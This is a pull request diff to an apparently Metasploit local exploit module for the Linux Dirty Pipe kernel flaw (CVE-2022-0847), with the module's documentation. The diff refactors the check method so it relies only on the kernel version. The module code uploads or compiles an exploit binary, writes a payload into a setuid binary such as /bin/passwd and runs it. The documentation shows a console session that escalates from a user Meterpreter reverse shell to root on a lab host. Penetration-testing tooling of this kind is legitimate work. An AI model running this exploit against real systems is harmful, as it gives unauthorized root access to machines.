### PR TITLE
Dirty Pipe Changes

### DIFF
--- a/documentation/modules/exploit/linux/local/cve_2022_0847_dirtypipe.md
+++ b/documentation/modules/exploit/linux/local/cve_2022_0847_dirtypipe.md
@@ -12,9 +12,6 @@ boundary (it needs to write one byte before the offset to add a reference to
 this page to the pipe), and the write cannot cross a page boundary.
 This means the payload must be less than the page size (4096 bytes).
 
-The `check` method uses the exploit without a payload, and without overwriting
-the suid binary.
-
 ## Verification Steps
 
 * Start `msfconsole`
@@ -27,54 +24,64 @@ the suid binary.
 ## Options
 
 ### WRITEABLE_DIR
+
 This indicates the location where you would like the payload and exploit stored, as well
 as serving as a location to store the various files and directories created by the exploit itself.
 The default value is `/tmp`
 
 ### SUID_BINARY_PATH
+
 This option is the path of the remote suid binary that will be overwritten with the payload.
 The default value is `/bin/passwd`, which should be present on most Linux distributions.
 
 ## Scenarios
 
-### Ubuntu 20.04 x64, Kernel Linux 5.8.0-41-generic
+### Ubuntu 20.10 x64, Kernel Linux 5.8.0-25-generic
 
 ```
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Sending stage (3020772 bytes) to 192.168.140.139
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.139:55512 ) at 2022-03-10 09:54:38 -0600
+
+meterpreter > getuid
+Server username: dirtypipe
+meterpreter > sysinfo
+Computer     : 192.168.140.139
+OS           : Ubuntu 20.10 (Linux 5.8.0-25-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 1...
 msf6 exploit(multi/handler) > use exploit/linux/local/cve_2022_0847_dirtypipe
 [*] Using configured payload linux/x64/meterpreter/reverse_tcp
-msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set SESSION 1
-SESSION => 1
-msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set LHOST 192.168.56.1
-LHOST => 192.168.56.1
-msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set LPORT 4455
-LPORT => 4455
+msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set session 1
+session => 1
+msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set lhost 192.168.140.1
+lhost => 192.168.140.1
 msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run
 
 [!] SESSION may not be compatible with this module:
 [!]  * missing Meterpreter features: stdapi_railgun_api
-[*] Started reverse TCP handler on 192.168.56.1:4455
+[*] Started reverse TCP handler on 192.168.140.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Executing exploit '/tmp/.ucilyzfyg /tmp/.pqwetud'
-[+] The target is vulnerable.
-[*] Executing exploit '/tmp/.ddvrzro /bin/passwd'
-[*] Sending stage (3020772 bytes) to 192.168.56.5
-[+] Deleted /tmp/.ucilyzfyg
-[+] Deleted /tmp/.pqwetud
-[+] Deleted /tmp/.ddvrzro
-[*] Meterpreter session 2 opened (192.168.56.1:4455 -> 192.168.56.5:36120 ) at 2022-03-09 08:23:01 +0000
-[*] Exploit result:
-[+] dirtypipe /bin/passwd
-[+] hijacking suid binary...
-[+] running suid payload...
-[+] restoring suid binary...
+[+] The target appears to be vulnerable. Linux kernel version found: 5.8.0
+[*] Writing '/tmp/.gxywtu' (35592 bytes) ...
+[*] Executing exploit '/tmp/.gxywtu /bin/passwd'
+[*] Sending stage (3020772 bytes) to 192.168.140.139
+[+] Deleted /tmp/.gxywtu
+[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.139:55514 ) at 2022-03-10 09:55:03 -0600
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 192.168.56.5
-OS           : Ubuntu 20.04 (Linux 5.8.0-41-generic)
+Computer     : 192.168.140.139
+OS           : Ubuntu 20.10 (Linux 5.8.0-25-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
+meterpreter >
 ```
 

--- a/modules/exploits/linux/local/cve_2022_0847_dirtypipe.rb
+++ b/modules/exploits/linux/local/cve_2022_0847_dirtypipe.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe("Linux kernel version #{kernel_version} is not vulnerable")
     end
 
-    return CheckCode::Appears("Linux kernel version found: #{kernel_version}")
+    CheckCode::Appears("Linux kernel version found: #{kernel_version}")
   end
 
   def exp_dir

--- a/modules/exploits/linux/local/cve_2022_0847_dirtypipe.rb
+++ b/modules/exploits/linux/local/cve_2022_0847_dirtypipe.rb
@@ -66,6 +66,7 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'URL', 'https://haxx.in/files/dirtypipez.c' ],
         ],
         'Notes' => {
+          'AKA' => [ 'Dirty Pipe' ],
           'Reliability' => [ REPEATABLE_SESSION ],
           'Stability' => [ CRASH_SAFE ],
           'SideEffects' => [ ARTIFACTS_ON_DISK ]
@@ -79,7 +80,6 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    # Is the arch supported?
     arch = kernel_arch
     unless live_compile? || arch.include?('x64') || arch.include?('aarch64') || arch.include?('x86') || arch.include?('armle')
       return CheckCode::Safe("System architecture #{arch} is not supported without live compilation")
@@ -93,95 +93,52 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe("Linux kernel version #{kernel_version} is not vulnerable")
     end
 
-    vprint_good "Linux kernel version #{kernel_version} appears vulnerable"
-
-    # check the binary
-    suid_binary_path = datastore['SUID_BINARY_PATH']
-    return CheckCode::Safe('The suid binary was not found; try setting SUID_BINARY_PATH') if suid_binary_path.nil?
-
-    return CheckCode::Safe("The #{suid_binary_path} binary setuid bit is not set") unless setuid?(suid_binary_path)
-
-    # run the exploit in check mode if everything looks right
-    if run_exploit(true)
-      return CheckCode::Vulnerable
-    end
-
-    return CheckCode::Safe('The target does not appear vulnerable')
+    return CheckCode::Appears("Linux kernel version found: #{kernel_version}")
   end
 
-  def run_exploit(check_mode)
-    if is_root? && !datastore['ForceExploit']
-      print_error 'Session already has root privileges. Set ForceExploit to override.'
-      return false
-    end
+  def exp_dir
+    datastore['WRITABLE_DIR']
+  end
+
+  def exploit
+    suid_binary_path = datastore['SUID_BINARY_PATH']
+    fail_with(Failure::BadConfig, 'The suid binary was not found; try setting SUID_BINARY_PATH') if suid_binary_path.nil?
+    fail_with(Failure::BadConfig, "The #{suid_binary_path} binary setuid bit is not set") unless setuid?(suid_binary_path)
 
     arch = kernel_arch
     vprint_status("Detected architecture: #{arch}")
-    unless check_mode
-      vprint_status("Detected payload arch: #{payload.arch.first}")
-      unless arch == payload.arch.first
-        print_error 'Payload/Host architecture mismatch.  Please select the proper target architecture'
-        return false
-      end
-
-      payload_data = generate_payload_exe[1..] # trim the first byte (0x74)
-      if payload_data.length > 4095
-        print_error "Payload size #{payload_data.length} is too large (> 4095)"
-        return false
-      end
+    vprint_status("Detected payload arch: #{payload.arch.first}")
+    unless arch == payload.arch.first
+      fail_with(Failure::BadConfig, 'Payload/Host architecture mismatch. Please select the proper target architecture')
     end
 
-    unless writable? datastore['WRITABLE_DIR']
-      print_error "#{datastore['WRITABLE_DIR']} is not writable"
-      return false
+    payload_data = generate_payload_exe[1..] # trim the first byte (0x74)
+    if payload_data.length > 4095
+      fail_with(Failure::BadConfig, "Payload size #{payload_data.length} is too large (> 4095)")
     end
 
-    exploit_file = "#{datastore['WRITABLE_DIR']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
+    fail_with(Failure::BadConfig, "#{exp_dir} is not writable") unless writable?(exp_dir)
+    exploit_file = "#{exp_dir}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
+
     if live_compile?
-      vprint_status 'Live compiling exploit on system...'
+      vprint_status('Live compiling exploit on system...')
       exploit_c = exploit_data('CVE-2022-0847', 'CVE-2022-0847.c')
-      unless check_mode
-        exploit_c.sub!(/payload_bytes.*$/, "payload_bytes[#{payload_data.length}] = {#{Rex::Text.to_num(payload_data)}};")
-      end
-      upload_and_compile exploit_file, exploit_c
+      exploit_c.sub!(/payload_bytes.*$/, "payload_bytes[#{payload_data.length}] = {#{Rex::Text.to_num(payload_data)}};")
+      upload_and_compile(exploit_file, exploit_c)
     else
-      vprint_status 'Dropping pre-compiled exploit on system...'
+      vprint_status('Dropping pre-compiled exploit on system...')
       exploit_bin = exploit_data('CVE-2022-0847', "CVE-2022-0847-#{arch}")
-      unless check_mode
-        payload_placeholder_index = exploit_bin.index('PAYLOAD_PLACEHOLDER')
-        exploit_bin[payload_placeholder_index, payload_data.length] = payload_data
-      end
-      upload_and_chmodx exploit_file, exploit_bin
+      payload_placeholder_index = exploit_bin.index('PAYLOAD_PLACEHOLDER')
+      exploit_bin[payload_placeholder_index, payload_data.length] = payload_data
+      upload_and_chmodx(exploit_file, exploit_bin)
     end
-    register_file_for_cleanup(exploit_file)
 
-    if check_mode
-      overwrite_file_path = "#{datastore['WRITABLE_DIR']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
-      register_file_for_cleanup(overwrite_file_path)
-      write_file(overwrite_file_path, 'A' * 8192)
-      chmod(overwrite_file_path, 0o440)
-    else
-      overwrite_file_path = datastore['SUID_BINARY_PATH']
-    end
+    register_file_for_cleanup(exploit_file)
+    overwrite_file_path = datastore['SUID_BINARY_PATH']
 
     cmd = "#{exploit_file} #{overwrite_file_path}"
     print_status("Executing exploit '#{cmd}'")
     result = cmd_exec(cmd)
-    if datastore['VERBOSE'] || !check_mode
-      print_status("Exploit result:\n#{result}")
-    end
-    if check_mode
-      chmod(overwrite_file_path)
-      overwritten_data = read_file(overwrite_file_path)[1..19]
-      if overwritten_data == 'PAYLOAD_PLACEHOLDER'
-        return true
-      end
-
-      return false
-    end
-  end
-
-  def exploit
-    run_exploit(false)
+    vprint_status("Exploit result:\n#{result}")
   end
 end


### PR DESCRIPTION
This removes the `run_exploit()` method as there were discussions about whether we should be compiling and executing the exploit via the `check()` method. This also means that we're only determining exploitability by kernel version detected.